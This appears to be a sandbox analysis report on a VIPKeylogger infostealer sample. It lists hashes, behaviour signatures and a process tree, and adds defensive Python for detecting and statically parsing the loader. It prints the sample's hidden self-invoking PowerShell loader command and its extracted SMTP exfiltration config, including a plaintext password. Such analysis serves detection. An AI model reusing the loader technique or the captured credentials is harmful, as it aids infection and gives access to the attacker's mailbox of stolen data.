Analysis
- max time kernel: 148s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-10-2024 12:20
Static task: static1
Behavioral task: behavioral1
- Sample: 001_215_EA2047939_202410210815.exe
- Resource: win7-20240708-en
Behavioral task: behavioral2
- Sample: 001_215_EA2047939_202410210815.exe
- Resource: win10v2004-20241007-en
Behavioral task: behavioral3
- Sample: Kontokurantens.ps1
- Resource: win7-20240729-en
Behavioral task: behavioral4
- Sample: Kontokurantens.ps1
- Resource: win10v2004-20241007-en
General
- Target: 001_215_EA2047939_202410210815.exe
- Size: 867KB
- MD5: 25da279ad7ee7cc3b8d3e5cd5aa4b5b2
- SHA1: d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
- SHA256: 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
- SHA512: db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
- SSDEEP: 12288:l9Zwb4/I1H06OdtVQuqilUSDFOIBETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0W:/dPFtVtOIB+alCJmvulW6Nd0vu
Malware Config
Extracted: vipkeylogger
- Protocol: smtp
- Host: smtp.ionos.fr
- Port: 587
- Username: [email protected]
- Password: Jc.2o3o@
- Email To: [email protected]
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Runs PowerShell with the display window hidden.
Processes:
- pid 1436 powershell.exe
- pid 2660 powershell.exe
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes:
- Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
Blocklisted process makes network request (13 IoCs)
Processes:
- pid 4360 msiexec.exe: flows 32, 37, 42, 54, 57, 67, 69, 73
- pid 4372 msiexec.exe: flows 33, 36, 43, 53, 58
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 66: checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes:
- pid 4360 msiexec.exe
- pid 4372 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes:
- pid 1436 powershell.exe
- pid 2660 powershell.exe
- pid 4360 msiexec.exe
- pid 4372 msiexec.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
Processes:
- pid 1400 WerFault.exe, target pid 4372 msiexec.exe
System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (001_215_EA2047939_202410210815.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:
- pid 1436 powershell.exe (9 events)
- pid 2660 powershell.exe (7 events)
- pid 4360 msiexec.exe (2 events)
Suspicious behavior: MapViewOfSection (2 IoCs)
Processes:
- pid 2660 powershell.exe
- pid 1436 powershell.exe
Suspicious use of AdjustPrivilegeToken (45 IoCs)
Processes:
- pid 1436 powershell.exe (22 events): SeDebugPrivilege (x2), SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the unnamed privileges 33, 34, 35, 36
- pid 2660 powershell.exe (22 events): SeDebugPrivilege (x2), SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the unnamed privileges 33, 34, 35, 36
- pid 4360 msiexec.exe (1 event): SeDebugPrivilege
Suspicious use of WriteProcessMemory (14 IoCs)
Processes (source -> target):
- PID 5088 001_215_EA2047939_202410210815.exe wrote to memory of PID 1436 powershell.exe (3 events)
- PID 5088 001_215_EA2047939_202410210815.exe wrote to memory of PID 2660 powershell.exe (3 events)
- PID 1436 powershell.exe wrote to memory of PID 4360 msiexec.exe (4 events)
- PID 2660 powershell.exe wrote to memory of PID 4372 msiexec.exe (4 events)
outlook_office_path (1 IoC)
Processes:
- Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
outlook_win_path (1 IoC)
Processes:
- Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (msiexec.exe)
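Turning the signatures above into detection logic: the following is an added Python example, not part of this report and not Triage's own signature code. It replays constructed process, registry and network events modelled on the PIDs, registry keys and hostname recorded above (plus two benign control events) and emits one finding per matched rule. The event field names, the control events, the IP-lookup hosts other than checkip.dyndns.org, and the allowlist of processes permitted to read Outlook profiles are assumptions; map the fields onto your own Sysmon or EDR schema.

```python
import re

# Constructed events (not real telemetry): the chain recorded in this report,
# keyed on its PIDs, plus two benign controls (an installer run and Outlook
# itself) so the rules can be checked for false positives.
SID = "S-1-5-21-2045521122-590294423-3465680274-1000"
LOADER_CMD = (
    r'"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw '
    r"'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';"
    r'$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"'
)
EVENTS = [
    {"type": "process", "pid": 5088, "ppid": 1000,
     "image": r"C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"'},
    {"type": "process", "pid": 1436, "ppid": 5088,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "cmdline": LOADER_CMD},
    {"type": "process", "pid": 4360, "ppid": 1436,
     "image": r"C:\Windows\SysWOW64\msiexec.exe", "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
    {"type": "registry", "pid": 4360, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "key": rf"\REGISTRY\USER\{SID}\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"type": "network", "pid": 4360, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "host": "checkip.dyndns.org", "port": 80},
    # Benign controls (assumed): a real installer, and Outlook reading its own profile.
    {"type": "process", "pid": 7000, "ppid": 900, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i C:\Temp\agent.msi /qn'},
    {"type": "registry", "pid": 7100, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "key": rf"\REGISTRY\USER\{SID}\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
]

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
# Read a file into $A, take $A.SubString(off,len) as $B, call .$B($A).
SELF_INVOKE_RE = re.compile(
    r"Get-Content\s+-raw\b.*\.SubString\(\d+,\s*\d+\).*\.\$\w+\(\$\w+\)", re.IGNORECASE | re.DOTALL)
# Both MAPI profile roots seen in the report (Office\<ver>\Outlook and Windows Messaging Subsystem).
OUTLOOK_PROFILE_RE = re.compile(
    r"\\(?:Office\\\d+\.\d+\\Outlook|Windows Messaging Subsystem)\\Profiles\\", re.IGNORECASE)
# checkip.dyndns.org is from the report; the others are assumed additions.
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "api.ipify.org", "icanhazip.com", "ifconfig.me"}
OUTLOOK_READERS = {"outlook.exe"}  # assumption: tune for your estate

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def has_args(cmdline):
    """True if anything follows the (possibly quoted) executable token."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.DOTALL)
    return bool(m and m.group(1).strip())

def lineage(events, pid, limit=16):
    """Image basenames from pid upward until an ancestor is not in the events."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    chain = []
    while pid in procs and len(chain) < limit:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain

def detect(events):
    """Return (pid, rule_name) pairs for every event that matches a rule."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        name = basename(e["image"])
        if e["type"] == "process":
            parent = procs.get(e["ppid"])
            pname = basename(parent["image"]) if parent else ""
            if name == "powershell.exe" and HIDDEN_RE.search(e["cmdline"]) and SELF_INVOKE_RE.search(e["cmdline"]):
                findings.append((e["pid"], "hidden_self_invoking_powershell_loader"))
            # msiexec.exe with no arguments has nothing to install; started by
            # PowerShell it is a hollow host for injected code, which matches the
            # WriteProcessMemory entries 1436 -> 4360 and 2660 -> 4372 above.
            if name == "msiexec.exe" and pname == "powershell.exe" and not has_args(e["cmdline"]):
                findings.append((e["pid"], "argless_msiexec_spawned_by_powershell"))
        elif e["type"] == "registry":
            if OUTLOOK_PROFILE_RE.search(e["key"]) and name not in OUTLOOK_READERS:
                findings.append((e["pid"], "outlook_profile_read_by_non_outlook_process"))
        elif e["type"] == "network":
            if e["host"].lower() in IP_LOOKUP_HOSTS:
                findings.append((e["pid"], "external_ip_lookup"))
    return findings

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule, " <- ".join(lineage(EVENTS, pid)))
```

The msiexec rule keys on the absence of arguments rather than on the image path alone, because a legitimate install always carries `/i`, `/x`, `/p` or a package path; the control event with `/i C:\Temp\agent.msi` is left alone while the argument-less SysWOW64 copy spawned by PowerShell is flagged.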
Processes
- C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe (PID 5088)
  Command line: "C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1436)
    Command line: "powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\msiexec.exe (PID 4360)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2660)
    Command line: "powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\msiexec.exe (PID 4372)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - C:\Windows\SysWOW64\WerFault.exe (PID 1400)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 2024
        - Program crash
- C:\Windows\SysWOW64\WerFault.exe (PID 2444)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4372 -ip 4372
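The two powershell.exe command lines above are the same self-invoking loader: read a file into one string, take three characters at a fixed offset as the name of a cmdlet or alias, then call that name with the whole string as its argument. The following is an added Python example, not part of the sandbox report, that parses that command line and reads the three-character window from the blob statically, without executing anything. Kontokurantens.Unc is not available on this page, so a constructed stand-in blob with an assumed `iex` token planted at offset 52189 is used; the cp1252 default decoding and the `iex` verdict list are assumptions as well.

```python
import re

# Command line recorded for PID 1436 in the process tree (PID 2660 is
# identical). Copied from the report; only the Python quoting is added.
CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw '
    r"'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';"
    r'$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"'
)

# Loader shape: $A = Get-Content -raw <path>; $B = $A.SubString(off,len); .$B($A)
# The variable names are throwaway, so they are captured rather than hard-coded.
LOADER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*Get-Content\s+-raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<verb>\w+)\s*=\s*\$(?P=blob)\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\$(?P=verb)\(\$(?P=blob)\)",
    re.IGNORECASE,
)

# Tokens that mean "execute the blob as script"; 'iex' is the Invoke-Expression
# alias. Assumption: extend if you meet other three-character aliases.
EXEC_VERBS = {"iex"}

def parse_loader(cmdline):
    """Return the blob path and SubString window, or None when the command
    line is not a Get-Content/SubString/self-invoke loader."""
    m = LOADER_RE.search(cmdline)
    if m is None:
        return None
    return {"path": m.group("path"), "offset": int(m.group("off")), "length": int(m.group("len"))}

def decode_like_get_content(blob_bytes):
    """Approximate Get-Content -raw in Windows PowerShell 5.1: honour a BOM,
    otherwise decode with the ANSI code page (cp1252 assumed). errors='replace'
    keeps the decode at one character per byte so the recorded offset stays valid."""
    if blob_bytes[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return blob_bytes.decode("utf-16")
    if blob_bytes[:3] == b"\xef\xbb\xbf":
        return blob_bytes.decode("utf-8-sig")
    return blob_bytes.decode("cp1252", errors="replace")

def extract_verb(blob_bytes, offset, length):
    """Slice the window the loader would invoke. SubString indexes characters
    of the decoded string, so slice after decoding, never on raw bytes: a
    UTF-16 file would put the token at twice the byte offset."""
    text = decode_like_get_content(blob_bytes)
    if offset + length > len(text):
        return None
    return text[offset:offset + length]

def triage(cmdline, blob_bytes):
    """Static verdict: what the loader would call, without running it."""
    info = parse_loader(cmdline)
    if info is None:
        return None
    verb = extract_verb(blob_bytes, info["offset"], info["length"])
    info["verb"] = verb
    info["executes_blob"] = verb is not None and verb.lower() in EXEC_VERBS
    return info

def build_stub_blob(offset, verb=b"iex", size=60000):
    """Constructed stand-in for Kontokurantens.Unc (the real file is not on
    this page): filler bytes with the assumed token planted at the offset."""
    blob = bytearray(b"A" * size)
    blob[offset:offset + len(verb)] = verb
    return bytes(blob)

if __name__ == "__main__":
    print(triage(CMDLINE, build_stub_blob(52189)))
```

When the real blob is available, feed its bytes to `triage` in place of the stub; if the three characters at 52189 are not an invocation token, the file is probably a different encoding or a different stage than the one this command line was written for, and the offset should be re-checked against the decoded length before concluding anything.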
Network
MITRE ATT&CK Enterprise v15
Downloads
The CryptnetUrlCache entries below are Windows CryptoAPI cache files (certificate chain and revocation data fetched during TLS validation); they are side effects of the network activity, not dropped payloads.
- Filesize: 854B
  MD5: e935bc5762068caf3e24a2683b1b8a88
  SHA1: 82b70eb774c0756837fe8d7acbfeec05ecbf5463
  SHA256: a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
  SHA512: bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Filesize: 1KB
  MD5: 9de7476fdc0bdfcc7b78c40eb0b7ae9c
  SHA1: e95ecafe1e4f0da7b4cd6d238d75d367f7c9b5cc
  SHA256: 8f4a054cea59ba5bc892962f7ee8c79dafd4ea7e182af0d7fbe3ce89f93750bc
  SHA512: 5bc6682c81b5cdea27a198215d02df7e64a53ca5c92d272d2b1140d32deea3d112b596e8eb35e6f79dc609964a32dab6a4ef83b3845b1057b86bd17537cd2cc2
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
  Filesize: 471B
  MD5: d27e8f4f186e50ed883dc1676cbb4038
  SHA1: 4dc99e2f5a1b7eafbceb0b837d9030424d67d8a4
  SHA256: ea5e76383ebf4550a6d4f3e561534cdbda582899df18c32c1ae085e0b1ff9ed8
  SHA512: 3f6c599fdc2eaf4b42b1b594226438cc4d9b3a7846577b16307023c355757b794b1305b260c0d9e0071483e709dc7d5d190ba89ef3808185b4cd2d529c932372
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
  Filesize: 472B
  MD5: fff9aba6fe7a03ac24297af4a6ef7600
  SHA1: 7ed4438da3b2bd2080a577c149f0029337d68fe8
  SHA256: 510ed87ce53d8777b77a0de99754d355529f7f2f9e9a05690b927d1ced4dbe92
  SHA512: 86b21267b1379717e414a374f113556c779246026569ab0adbda017d68532a62bd8999e5deb49f059b76c0c10ea15ca40e251f7efc5bdddbac7114ee002342c8
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
  Filesize: 170B
  MD5: 289f70c79cd3e954b833d33501de9a2e
  SHA1: b3c2ad1f1ae4c0a85d7b1272c585b9de545a0d89
  SHA256: 74d592f8d989fb63e5b732028d7101f66e773654d69421c4a7fd9447afe52446
  SHA512: 67f49c543241a5125fdc42d29968d0f68c7a4534fae3836be853320f129c4868a6f109d2e0f6ac17604f8b16fbf55123be053700c555b0cddaebf262f696e81d
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Filesize: 410B
  MD5: 314e6c7a9b2e8e977c3012ae2c92a73d
  SHA1: 15ed7eafddb45c2063bda843c7aef3b1abaa415e
  SHA256: b8f830c056f20d40288d3601c6ec2b796649c3121c77f143a7f9571c18c9dc8d
  SHA512: 473f176d407fe41231a53e4ef190ab87a72ee7bfb0b6ee368b6782a08c57341f70181c26429554196e410c3f2cc7692306f4166a7ad915bde02f0d99bb095882
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
  Filesize: 406B
  MD5: 831bfa8c46326829da481ddf47de6750
  SHA1: 7e533e3733c928714e38c056e50c44520acae93a
  SHA256: 615559aa045cc3bb50ebffbc7545a70068a9533f118204f420599758f3b48733
  SHA512: 4279da0c01b155cccf59247ce0c71a23e886553be01fa19302fcb71d97f7a2c011ff392286724e6cad6ffe3dcd5fff7b42b5156423a3bcac47c8a285eb400be6
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
  Filesize: 402B
  MD5: f002a947c787884888e16ffbeb09413c
  SHA1: 43aecaed52d8cc065e9b733071a6b3fe4af7b945
  SHA256: 997782a3f7b46a9b0e8dbcd1fef717fcd4ec910277790e656aa66bb422ce363b
  SHA512: 2bc953481bcf7b6a62d9b0950b762bb1eee60f6c701115577248df1d64ecf90f23a7de38ae50c2e5ae91641318dbaa9287600c270eaeb44fd4e18a7b7a6436d1
- Filesize: 53KB
  MD5: 01404e51f6442f60e478c306b1e6e52e
  SHA1: 37f234ccf5611b8309023410ceb9e76ad81f5678
  SHA256: d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
  SHA512: 94a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 334KB
  MD5: 8dc34d1e450d9695f44738379365b189
  SHA1: 9e77d26860ba038a647b6670fd0ddd2c961d0666
  SHA256: fb8575b17a714bab821f43e25454975876348a6ccf9fb580f25351311d09690b
  SHA512: f842056d5dcd6f43c88ff6ba91eb6207d3fa48b4e38f050a756fbe3d281cf8483def8a4221f63407953d589be05a7505c31fc6df12a0ed77dd64581e27722f08
- Filesize: 50KB
  MD5: 8a4da8bab6993bc24f8ba89b1a5035ba
  SHA1: 0266616ebaff76b9027bdf4a52742bbb6d7dbf90
  SHA256: d19add8d848501931650d9c2f77d4519b15ffe2399a161dac88ea99c07f1b62d
  SHA512: 1f604a65b0fb4543feab6eb9584aab3c47c5ebcabf251492c7be827e3c5d547f310ff05354bf30837fe8192be427c1855ec22783a0be14db15b40b1f05a13c50